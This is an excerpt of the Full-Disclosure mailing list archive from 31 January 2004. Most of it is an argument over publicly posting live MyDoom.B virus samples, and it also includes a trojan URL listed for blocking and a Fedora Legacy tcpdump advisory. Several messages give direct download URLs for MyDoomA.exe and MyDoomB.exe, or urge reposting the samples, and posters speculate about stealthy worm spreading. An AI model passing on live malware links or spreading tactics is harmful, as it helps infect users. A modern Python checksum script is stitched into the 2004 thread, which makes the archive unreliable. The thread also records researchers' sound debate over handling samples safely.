Sorry guys, I tried to help people out here but it would seem greater 
powers are at work here. Don't email me asking for copies as I won't be 
giving any more out. I suggest you direct future request for this virus 
towards McAfee, perhaps in their infinite wisdom they will be willing 
to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC
7eyngBEgA4TEOEmV1DIzlMNk
=A6V6
-END PGP SIGNATURE-



RE: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Steve Wray
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Paul Schmehl
> 
> --On Saturday, January 31, 2004 12:25 PM -0500 
> [EMAIL PROTECTED] 
> wrote:
> 
> > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
> > <[EMAIL PROTECTED]>  said:
> >
> > What worries me is we haven't seen *either* an actual damaging virus
> > (imagine if the last 2 lines of Mydoom were "sleep(4hours); 
> > exec("format c:);") or a "sleeper" virus.
> 
> This doesn't worry me much at all.  Since virus writing has 
> been taken over by the scammers, spammers, criminals and thieves, the
last 

Paul, your quoting is a bit off there (makes it look as if I wrote that),
but to address the points, as one person wrote, its difficult to spread 
fast when you are trying to be stealthy; I would argue that if one is 
stealthy enough, one doesn't need to spread fast since one is trying to 
evade detection rather than evading elimination.

If a virus could spread slowly but stealthily, it could be all over
the planet and activated before any antivirus vendor became aware
of its presence and came out with a fix; it wouldn't matter much
if it took a year of quiet spreading.

Sometimes (and here I go sounding paranoid again) it seems that the
viruses and worms we see are nothing but a smokescreen; they are
SO VERY obvious.

so-called 'script kiddies' and the old school vxers wanted a quick hit
of adrenalin. Organised crime syndicates are a lot more patient.





[Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread Gadi Evron
The past Trojan horses which spread this way took advantage of the fact 
web servers send an HTML 404 message if a file doesn't exist.

The original sample - britney.jpg - was simply an html file itself, and 
using that fact, and IE loading it. It was combined with one of the 
latest exploits of the time (I don't think MS patched it yet), and 
downloaded the Trojan horses.

This time around there is actually a picture on the web page, of a real 
honest to God girl. But in another frame.. the same story all over again.

For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Gadi Evron.



[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilities

2004-01-31 Thread Jesse Keating
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

---
   Fedora Legacy Update Advisory

Synopsis:  Updated tcpdump resolves security vulnerabilities
Advisory ID:   FLSA:1222
Issue date:2004-01-31
Product:   Red Hat Linux
Keywords:  Security
Cross references:  https://bugzilla.fedora.us/show_bug.cgi?id=1222
CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057
---

1. Topic:

Updated tcpdump packages are now available that fix multiple security 
vulnerabilities which may allow remote attackers to exploit these issues 
by sending carefully-crafted packets to a victim. If the victim uses 
tcpdump, these packets could result in a denial of service, or possibly 
execute arbitrary code as the 'pcap' user.

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can 
capture and display the packet headers on a particular network interface 
or on all interfaces. Tcpdump can display all of the packet headers, or 
just the ones that match particular criteria. 

George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump 
versions prior to 3.8.1. The Common Vulnerabilities and Exposures project 
(cve.mitre.org) has assigned the name CAN-2003-0989 to this issue.

Jonathan Heusser discovered an additional flaw in the ISAKMP decoding 
routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and 
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to 
this issue.

Jonathan Heusser discovered a flaw in the print_attr_string function in the 
RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common 
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the 
name CAN-2004-0055 to this issue.

Users of tcpdump should update to these update packages, which contain a 
backported security patch that corrects this issue.

Fedora Legacy would like to thank George Bakos and Jonathan Heusser for 
discovering and disclosing these issues, as well as Christian Pearce for 
providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

4. Solution:

Before applying this update, make sure all previously released errata 
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those 
RPMs which are currently installed will be updated.  Those RPMs which are 
not installed but included in the list will not be updated.  Note that you 
can also use wildcards (*.rpm) if your current directory *only* contains 
the desired RPMs.

Please note that this update is also available via yum and apt.  Many 
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate 
RPMs being upgraded on your system.  This assumes that you have yum or 
apt-get configured for obtaining Fedora Legacy content. Please visit 
http://www.fedoralegacy.org/download for directions on how to configure 
yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
- ---
a10c0d99cd919f459a25fdb5562d6907667b33d3  
7.2/updates-testing/SRPMS/tcpdump-3.6.3-17.7.2.4.l

[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilities (resend with correct paths)

2004-01-31 Thread Jesse Keating
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
   Fedora Legacy Update Advisory

Synopsis:          Updated tcpdump resolves security vulnerability
Advisory ID:       FLSA:1222
Issue date:        2004-01-31
Product:           Red Hat Linux
Keywords:          Security
Cross references:  https://bugzilla.fedora.us/show_bug.cgi?id=1222
CVE Names:         CAN-2003-0989, CAN-2004-0055, CAN-2004-0057
- ---

1. Topic:

Updated tcpdump packages are now available that fix multiple security 
vulnerabilities which may allow remote attackers to exploit these issues 
by sending carefully-crafted packets to a victim. If the victim uses 
tcpdump, these packets could result in a denial of service, or possibly 
execute arbitrary code as the 'pcap' user.

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can 
capture and display the packet headers on a particular network interface 
or on all interfaces. Tcpdump can display all of the packet headers, or 
just the ones that match particular criteria.

George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump 
versions prior to 3.8.1. The Common Vulnerabilities and Exposures project 
(cve.mitre.org) has assigned the name CAN-2003-0989 to this issue.

Jonathan Heusser discovered an additional flaw in the ISAKMP decoding 
routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and 
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to 
this issue.

Jonathan Heusser discovered a flaw in the print_attr_string function in the 
RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common 
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the 
name CAN-2004-0055 to this issue.

Users of tcpdump should update to these update packages, which contain a 
backported security patch that corrects this issue.

Fedora Legacy would like to thank George Bakos and Jonathan Heusser for 
discovering and disclosing these issues, as well as Christian Pearce for 
providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

4. Solution:

Before applying this update, make sure all previously released errata 
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those 
RPMs which are currently installed will be updated.  Those RPMs which are 
not installed but included in the list will not be updated.  Note that you 
can also use wildcards (*.rpm) if your current directory *only* contains 
the desired RPMs.

Please note that this update is also available via yum and apt.  Many 
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate 
RPMs being upgraded on your system.  This assumes that you have yum or 
apt-get configured for obtaining Fedora Legacy content. Please visit 
http://www.fedoralegacy.org/download for directions on how to configure 
yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
- ---
a10c0d99cd919f459a25fdb5562d6907667b33d3  
7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src
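Checking downloaded packages against section 7 of the advisory above, as an added example (not Fedora Legacy's own tooling): it undoes the "- " dash-escaping that PGP clearsigning adds to lines beginning with "-" (the "- ---" separators visible above), reads the digest/path pairs even when the archive has wrapped the path onto the line after its digest, and compares local files. The advisory excerpt and its digests are constructed, as are the stand-in files; only the package names are the ones listed above.

```python
"""Verify downloaded update RPMs against the SHA1 table of a clearsigned advisory.

Added example, not Fedora Legacy's own tooling. The advisory excerpt below is
constructed (its digests are not the real advisory's), and files are written
to a temporary directory to stand in for downloaded packages.
"""
import hashlib
import os
import re
import tempfile

HEX40 = re.compile(r"[0-9a-f]{40}")


def undash(text: str) -> str:
    """Undo PGP clearsign dash-escaping: a '- ' prefix on lines that start with '-'."""
    return "\n".join(l[2:] if l.startswith("- ") else l for l in text.splitlines())


def parse_verification(advisory_text: str) -> dict:
    """Map package path -> expected SHA1 from the '7. Verification:' section.

    Handles both 'sha1  path' on one line and the wrapped form seen in list
    archives, where the path lands on the line after its digest.
    """
    sums, pending, in_section = {}, None, False
    for line in undash(advisory_text).splitlines():
        if line.startswith("7. Verification"):
            in_section = True
            continue
        if not in_section:
            continue
        tokens = line.split()
        if pending and tokens:              # path wrapped onto the next line
            sums[tokens[0]] = pending
            pending = None
        elif len(tokens) >= 2 and HEX40.fullmatch(tokens[0]):
            sums[tokens[1]] = tokens[0]
        elif len(tokens) == 1 and HEX40.fullmatch(tokens[0]):
            pending = tokens[0]
    return sums


def sha1_of_file(path: str) -> str:
    """Hex SHA1 of a file, read in chunks so large RPMs do not sit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(sums: dict, download_dir: str) -> dict:
    """Return package path -> 'ok' | 'mismatch' | 'missing'.

    Assumes packages were saved under their own file names (the basename of
    the mirror path) in download_dir.
    """
    results = {}
    for rel_path, expected in sums.items():
        local = os.path.join(download_dir, os.path.basename(rel_path))
        if not os.path.isfile(local):
            results[rel_path] = "missing"
        else:
            results[rel_path] = "ok" if sha1_of_file(local) == expected else "mismatch"
    return results


# Constructed stand-in content and a constructed advisory excerpt (digests are
# placeholders, not the advisory's real values).
GOOD_BYTES = b"constructed stand-in for tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm\n"
GOOD_SHA1 = hashlib.sha1(GOOD_BYTES).hexdigest()
FAKE_SHA1_A = "0" * 40
FAKE_SHA1_B = "1" * 40
PKG_TCPDUMP = "7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm"
PKG_LIBPCAP = "7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm"
PKG_ARPWATCH = "7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm"
CONSTRUCTED_ADVISORY = f"""- ---
   Fedora Legacy Update Advisory (constructed excerpt)
- ---

7. Verification:

SHA1 sum Package Name
- ---
{GOOD_SHA1}  
{PKG_TCPDUMP}
{FAKE_SHA1_A}  {PKG_LIBPCAP}
{FAKE_SHA1_B}  {PKG_ARPWATCH}
"""


def demo() -> dict:
    """Write two stand-in downloads (one intact, one corrupted) and verify them."""
    sums = parse_verification(CONSTRUCTED_ADVISORY)
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, os.path.basename(PKG_TCPDUMP)), "wb") as f:
            f.write(GOOD_BYTES)
        with open(os.path.join(d, os.path.basename(PKG_LIBPCAP)), "wb") as f:
            f.write(b"truncated or tampered download\n")
        return verify_downloads(sums, d)


if __name__ == "__main__":
    for pkg, state in demo().items():
        print(f"{state:9} {pkg}")
```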

Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread Paul Schmehl
--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari.  The girl 
was... uh... well-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu


RE: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Bojan Zdrnja
 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Steve Wray
> Sent: Sunday, 1 February 2004 10:46 a.m.
> To: 'Paul Schmehl'; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] MyDoom download info
> 
> If a virus could spread slowly but stealthily, it could be all over
> the planet and activated before any antivirus vendor became aware
> of its presence and came out with a fix; it wouldn't matter much
> if it took a year of quiet spreading.

Nah, that would work if there were no honeypots. I'm sure that 99% of AV
companies, as well as numerous other security companies/individuals, run
honeypots, and they would catch this pretty quickly as your worm can't know
what's a honeypot and what isn't (I'm not going into honeypot detection
techniques now).
Therefore, the only way for a worm to be successful is to spread as fast as
it can, which in turn results in disruptions of service for the host machine
and easier detection.

Cheers,

Bojan




Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks
On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]>  said:

> but to address the points, as one person wrote, its difficult to spread 
> fast when you are trying to be stealthy; I would argue that if one is 
> stealthy enough, one doesn't need to spread fast since one is trying to 
> evade detection rather than evading elimination.

Very true...

> If a virus could spread slowly but stealthily, it could be all over
> the planet and activated before any antivirus vendor became aware
> of its presence and came out with a fix; it wouldn't matter much
> if it took a year of quiet spreading.

On the other hand, it severely limits your growth potential.

If you go for a spread-fast strategy, you *will* set off all the white
hats' detectors (on sheer unexpected traffic volume, if nothing else).
You then have 100 white hats all starting from ground zero in analyzing
the critter, and you're basically limited to however many systems you
can nail in 8 hours before they get a signature out the door.  But since
you're spreading fast, that's still a lot of systems.

What I probably didn't make clear enough the first time I said it was that
if you're propagating slowly, you need to be *very* careful - all it takes
is for you to hit *one* wrong IDS or honeypot and you've been spotted.
And more importantly for the discussion, even if it takes that researcher
a week of evening and lunch hours to figure out what you're up to, you
won't have gotten many more systems during that week.

Consider that a fast-spreading worm can nail several million boxes, while
the average IRC botnet built more stealthily is in the several 10K range.

> Sometimes (and here I go sounding paranoid again) it seems that the
> viruses and worms we see are nothing but a smokescreen; they are
> SO VERY obvious.

Welcome to the club. Want some tinfoil? :)




Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Nick FitzGerald
Roland Dobbins <[EMAIL PROTECTED]> wrote:

> I know Dan Spisak personally, and can vouch for his honesty and 
> integrity.

And _you_ are???

It seems you largely missed the point.

...

Anyway, it is interesting to know that Cisco employs people who think 
there is integrity in both publicly distributing viruses, and doing so 
after repackaging them with a "dropper" that makes them not immediately 
detectable.


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Nico Golde
Hello Steve,

* Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]:
> > You can always disassemble the virus, which is what people 
> > will do if it's a real "popular" one such as MyDoom. 
> 
> IIRC there are viruses that are encrypted and are almost impossible
> to disassemble?
> 
> Would that be true?
 
I think not forever.
There is a good Phrack article about binary encryption.
Nico
-- 
Nico Golde nico  ngolde  de
public key available on:
http://www.ngolde.de/gpg.html




Re[2]: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Thierry

NF>that x employs people who think
NF>there is integrity in both publicly
NF>distributing viruses

I read F u l l - D i s c l o s u r e
not restricted Disclosure.

I applaud the person who posted the B variant, for me the only chance
to "analyse" that one.

NF> after repackaging them with a "dropper" that makes them not immediately 
NF> detectable.

Let's call this "NAME of File" detection, shall we? It goes like this:
MyDoomA.exe = MyDoomA virus - MyDoomB.exe = MyDoomB virus

Quit the whining and post something productive.



RE: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Mike
Hi Daniel,
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???

I have copied the files to the following locations:
http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe

http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe

Mike

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Daniel
Spisak
Sent: Sunday, February 01, 2004 10:38 AM
To: [Full Disclosure]
Subject: [Full-Disclosure] MyDoom.b samples taken down


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have been asked by McAfee to take down my copy of MyDoom.B as they
have insinuated that I am now responsible for this virus spreading.
Sorry guys, I tried to help people out here but it would seem greater
powers are at work here. Don't email me asking for copies as I won't be
giving any more out. I suggest you direct future request for this virus
towards McAfee, perhaps in their infinite wisdom they will be willing
to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC
7eyngBEgA4TEOEmV1DIzlMNk
=A6V6
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Frank Knobbe
On Sun, 2004-02-01 at 06:08, Mike wrote:
> I have copied the files to the following locations:
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe


And so the virus spreads again, and by means not anticipated by its
author... Spreading via search engines, and infecting people wanting to
download the Doom sequel...

When posting viruses, may I suggest a mechanism that forces someone to
manually click on a button or enter a number or something? Anything that
prevents automatic download from a URL. Otherwise your web space might
be misused by MyDoomC as a download point.

Regards,
Frank





Re: [Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread Valdis . Kletnieks
On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED]  said:

> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there are the tools they use.

Damn, I've been outed.  The average script kiddie probably has more
exploits on their hard drive than I do, I must be a Ted Sturgeon expert.




Re[2]: [Full-Disclosure] MyDoom download info

2004-01-31 Thread J.A. Terranson

On Sun, 1 Feb 2004, Thierry wrote:

> NF>that x employs people who think
> NF>there is integrity in both publicly
> NF>distributing viruses
>
> I read F u l l - D i s c l o s u r e
> not restricted Disclosure.

Exactly.


> Quit the whining and post something productive.

Hear, hear!

-- 
Yours,
J.A. Terranson
[EMAIL PROTECTED]

"Unbridled nationalism, as distinguished from a sane and legitimate
patriotism, must give way to a wider loyalty, to the love of humanity as a
whole. Bahá'u'lláh's statement is: "The earth is but one country, and mankind
its citizens."

The Promise of World Peace
http://www.us.bahai.org/interactive/pdaFiles/pwp.htm




[Full-Disclosure] MyDoom.B

2004-01-31 Thread Daniel Spisak
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Look, apparently this is not the list for me to be on. All I was trying 
to do at first was find B to analyze. Then I tried to provide it to 
people via email but that quickly escalated past what I could 
personally handle by myself. Then I gave the URL to the list and now we 
have this fine mess. McAfee was just trying to give me a friendly nudge 
that what I did was probably not the best method of distribution. So 
try to not harbor any ill will towards them, they were just trying to 
do their job. I overreacted and it would seem this situation would 
dearly like to spiral out of control. I never wished to drag people I 
know needlessly into a pissing match. Nor did I ever wish to intend to 
make this variant more active in the wild.

If you are mirroring the files I had previously hosted please take them 
down from your sites and distribute them via email only if at all 
possible. Posting the virus to a URL on this list means it ends up on 
the web archive which means it shows up in Google which means any Tom, 
Dick, or Jane can download the live virus. So if you wish to help 
others email is the way I suggest.

Anyways, I'm going to shut the hell up now for a while and hope that 
what sanity is left can prevail here.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBxKORUn/Hz8mr7jEQJvJQCfdGYHvz5Qlgd76ztAGqHFN7LwuOYAoK3w
qJ8Lx50TPcv9mk1bDWh3HmTu
=RQDD
-END PGP SIGNATURE-



Re: [Full-Disclosure] MyDoom.B

2004-01-31 Thread Jeremiah Cornelius
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Saturday 31 January 2004 16:37, Daniel Spisak wrote:
> Look, apparently this is not the list for me to be on. All I was trying
> to do at first was find B to analyze. Then I tried to provide it to
> people via email but that quickly escalated past what I could
> personally handle by myself. Then I gave the URL to the list and now we
> have this fine mess. McAfee was just trying to give me a friendly nudge
> that what I did was probably not the best method of distribution. So
> try to not harbor any ill will towards them, they were just trying to
> do their job. I overreacted and it would seem this situation would
> dearly like to spiral out of control. I never wished to drag people I
> know needlessly into a pissing match. Nor did I ever wish to intend to
> make this variant more active in the wild.

You want a job with NA someday?  Not that there's anything /wrong/ with that!

base-64 'em, and post with an adequate warning - to this list. They'll be 
web-archived within minutes anyway.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAHFVVJi2cv3XsiSARAjGaAJ429/SfuaY6O663VEeyObLyqpIzjQCg24l4
i3EQRPe9ZF63i8sWhquVXpU=
=IbcU
-END PGP SIGNATURE-



Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske
Mike wrote:

> That's unbelievable and incredibly lame of McAfee!!
> Are we supposed to sit and wait for our free copies to be delivered to us by
> the very people we are trying to stop from getting infected???

Daniel and Mike, thanks for making those files available for those of us 
who wish to research this virus firsthand, instead of relying on 
(sometimes) wildly inaccurate media and "expert" reporting.

Shame on McAfee for succeeding in intimidating a fellow researcher - I 
guess that's what happens when viruses become Big Business; use whatever 
FUD is available to limit your competition, increase market share and 
maximize shareholder value. Foo.







Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Nick FitzGerald
Kurt Weiske <[EMAIL PROTECTED]> wrote:

> Daniel and Mike, thanks for making those files available for those of us 
> who wish to research this virus firsthand, instead of relying on 
> (sometimes) wildly inaccurate media and "expert" reporting.
> 
> Shame on McAfee for succeeding in intimidating a fellow researcher - I 

It seems that "intimidation" may have been too strong a word -- see  
Daniel's latest post -- but whatever...

> guess that's what happens when viruses become Big Business; use whatever 
> FUD is available to limit your competition, increase market share and 
> maximize shareholder value. Foo.

No -- that's what happens when you actually have half a clue about the 
huge _further_ damage such things can do if actually successfully 
distributed.  Mydoom.B has largely _not_ taken off, but all it probably 
needs is a touch of the usual "luck" which is all that distinguishes 
most successful mass-mailers from the huge numbers of unsuccessful ones 
lamers, like those on this list clamouring to get a Mydoom.B sample, 
never see.

I know most of you will not believe this because you are so stupid you 
already believe that live virus samples are _just_ information and 
therefore _should_ be subject to "full disclosure" (this is a special 
form of ignorance that very little empirical evidence seems able to 
budge -- at least until a holder of the ignorance is the person bitten 
by it), _but_ each extra copy of Mydoom.B downloaded from the various 
URLs published on this list increases the likelihood that the virus 
writer will have his "glory" with the Mydoom.B variant as well.  The 
cost of that far outweighs the value of the jollies a few of you will 
get from working out how to unpack the "hacked" UPX compression  used, 
poking a few clever comments into your disasm, or mastering ROT13 to 
"decrypt" the virus' internal strings.  In the process, some of you 
will run it in a VM connected via virtual network to the real Internet 
(because you are so stupid you believe that "because you run Linux you 
are safe" or you forgot you enabled bridged networking for some 
"special reason" and never got round to disabling it) and more copies 
of it will "escape" (we see this often).  And you want to subject the 
world to that threat because you want to spend hours and hours doing 
what has been done "well enough" in multiple professional security 
company labs for them to ship detection and repair utilities within 
minutes to an hour or two of first receiving a sample of it several 
days ago.  Get real...

Try handling dozens of these a day and then see what you feel about the 
quality of the work of those labs and that 'wildly inaccurate [...] 
"expert" reporting'.

And save me the almost inevitable full-disclosure mantra BS replies!  I 
really do not want to hear your ignorance rephrased that way, again -- 
at least walk the walk before you try to talk the talk...


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]

2004-01-31 Thread Daniel H. Renner
Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only an
MSN MSGR site - sorry.

Dan

-Forwarded Message-

From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari.  The girl 
was... uh... well-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]

2004-01-31 Thread Daniel H. Renner
Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the
message was "(111) Connection refused" by
http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla? 
:-)

Our proxy shows the following path when you click the link:
http://freedns.afraid.org/blank.html
http://mitglied.lycos.de/mycutewebspace
http://207.46.110.24/gateway/gateway.dll?


Cheers,
Dan

-Forwarded Message-

From: Paul Schmehl <[EMAIL PROTECTED]>
